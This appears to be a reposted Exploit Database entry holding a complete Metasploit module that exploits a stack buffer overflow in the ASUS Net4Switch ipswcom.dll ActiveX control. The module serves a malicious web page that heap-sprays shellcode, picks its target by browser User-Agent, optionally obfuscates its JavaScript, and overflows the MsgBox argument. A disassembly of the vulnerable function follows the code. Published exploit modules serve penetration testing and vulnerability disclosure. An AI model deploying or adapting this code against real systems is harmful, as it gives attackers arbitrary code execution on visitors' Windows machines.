ASUS Net4Switch – ‘ipswcom.dll’ ActiveX Stack Buffer Overflow (Metasploit)

• Exploit Database
• 121 阅读

• 作者： Metasploit
  日期： 2012-02-29
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18538/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::Remote::HttpServer::HTML   def initialize(info={}) super(update_info(info, &apos;Name&apos; => "ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow", &apos;Description&apos;=> %q{ This module exploits a vulnerability found in ASUS Net4Switch&apos;s ipswcom.dll ActiveX control.A buffer overflow condition is possible in multiple places all because of the poor use of the CxDbgPrint() function, which allows remote attackers to gain arbitrary code execution under the context of the user. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Dmitriy Evdokimov&apos;, #Initial discovery, poc &apos;sinn3r&apos; #Metasploit ], &apos;References&apos; => [ [ &apos;OSVDB&apos;, &apos;http://osvdb.org/show/osvdb/79438&apos; ], [ &apos;URL&apos;, &apos;http://dsecrg.com/pages/vul/show.php?id=417&apos; ] ], &apos;Payload&apos;=> { &apos;BadChars&apos;=> "\x00", &apos;StackAdjustment&apos; => -3500, }, &apos;DefaultOptions&apos;=> { &apos;ExitFunction&apos; => "seh", &apos;InitialAutoRunScript&apos; => &apos;migrate -f&apos;, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Automatic&apos;, {} ], [ &apos;IE 6 on Windows XP SP3&apos;, { &apos;Max&apos; => &apos;0x40000&apos;, &apos;Offset&apos; => &apos;0x500&apos; } ], [ &apos;IE 7 on Windows XP SP3&apos;, { &apos;Max&apos; => &apos;0x40000&apos;, &apos;Offset&apos; => &apos;0x500&apos; } ] ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => "Feb 17 2012", &apos;DefaultTarget&apos;=> 0))   register_options( [ OptBool.new(&apos;OBFUSCATE&apos;, [false, &apos;Enable JavaScript obfuscation&apos;]) ], self.class) end   def get_target(agent) return target if target.name != &apos;Automatic&apos;   if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1]#IE 6 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[2]#IE 7 on Windows XP SP3 else return nil end end   def on_request_uri(cli, request) agent = request.headers[&apos;User-Agent&apos;] my_target = get_target(agent)   if my_target.nil? print_error("Browser not supported: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}") send_not_found(cli) return end   p = payload.encoded js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) nops = Rex::Text.to_unescape(make_nops(4))   spray = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{nops}");   while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target[&apos;Offset&apos;]}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);   while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2);   heap_obj.gc();   for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } JS   spray = heaplib(spray, {:noobfu => true})   js = <<-JS var obj = new ActiveXObject("ipswcom.IPSWComItf");   #{spray}   function generate_padding(d, s) { var tmp = d; while (tmp.length < s) { tmp += tmp; } var buf = tmp.substring(0, s/2); tmp = null; return buf; }   var arg1 = generate_padding(unescape("%u4141"), 4);   var arg2 = "A"; // Expands to 0x0041, helps us to align the stack arg2 += generate_padding(unescape("%u4343"), 2680); arg2 += unescape("%u4242%u4242"); arg2 += unescape("%u0d0d%u0d0d"); arg2 += generate_padding(unescape("%u0d0d"), #{my_target[&apos;Max&apos;]}-arg2.length);   obj.MsgBox(arg1, arg2, 2); JS   #obfuscate on demand if datastore[&apos;OBFUSCATE&apos;] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end   html = <<-EOS <html> <head> </head> <body> <script> #{js} </script> </body> </html> EOS   html = html.gsub(/\t\t/, &apos;&apos;)   print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {&apos;Content-Type&apos;=>&apos;text/html&apos;})   end   end   =begin Download: http://www.softpedia.com/progDownload/ASUS-Net4Switch-Download-203619.html   clsid:1B9E86D8-7CAF-46C8-9938-569B21E17A8E C:\Program Files\ASUS\Net4Switch\ipswcom.dll   .text:10030523 pushecx .text:10030524 mov eax, [ebp+arg_C] .text:10030527 mov [ebp+var_4], eax .text:1003052A cmp [ebp+var_4], 0 .text:1003052E jzshort loc_10030541<-- uType 10h .text:10030530 cmp [ebp+var_4], 1 .text:10030534 jzshort loc_10030573<-- uType 44h .text:10030536 cmp [ebp+var_4], 2 .text:1003053A jzshort loc_100305A5<-- CxDbgPrint ... .text:100305A5 loc_100305A5: ; CODE XREF: MsgBox+1Aj .text:100305A5 mov eax, [ebp+lpText] .text:100305A8 pusheax .text:100305A9 pushoffset aIpsw_alertS ; "[IPSW_alert] = %s" .text:100305AE push0FFh .text:100305B3 callds:CxDbgPrint =end